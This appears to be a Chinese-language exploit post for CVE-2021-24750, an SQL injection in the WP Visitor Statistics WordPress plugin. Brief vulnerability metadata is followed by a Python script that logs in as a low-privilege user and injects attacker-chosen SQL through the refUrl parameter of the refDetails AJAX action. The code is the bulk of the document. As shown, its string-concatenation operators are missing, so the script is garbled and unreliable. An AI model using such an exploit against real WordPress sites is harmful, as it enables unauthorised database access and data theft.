版本:<= 4.7
测试环境:Ubuntu 18.04
CVE:CVE-2021-24750
CWE:CWE-89
描述:
4.8 之前的 WP 访问者统计(实时流量)WordPress 插件无法正确清理和转义 refDetails AJAX 操作中的 refUrl,任何经过身份验证的用户都可以使用,这可能允许角色低至订阅者的用户执行 SQL 注入攻击。
https://nvd.nist.gov/vuln/detail/CVE-2021-24750
代码语言:javascript复制import argparse
import requests
from datetime import datetime
# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin WP Visitor Statistics - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND
print('')
print('[*] Starting Exploit at: ' str(datetime.now().strftime('%H:%M:%S')))
print('')
# Authentication:
session = requests.Session()
auth_url = 'http://' target_ip ':' target_port wp_path 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
# Exploit:
exploit_url = 'http://' target_ip ':' target_port '/wordpress/wp-admin/admin-ajax.php?action=refDetails&requests={"refUrl":"' "' " command '"}'
exploit = session.get(exploit_url)
print(exploit.text)
print('Exploit finished at: ' str(datetime.now().strftime('%H:%M:%S')))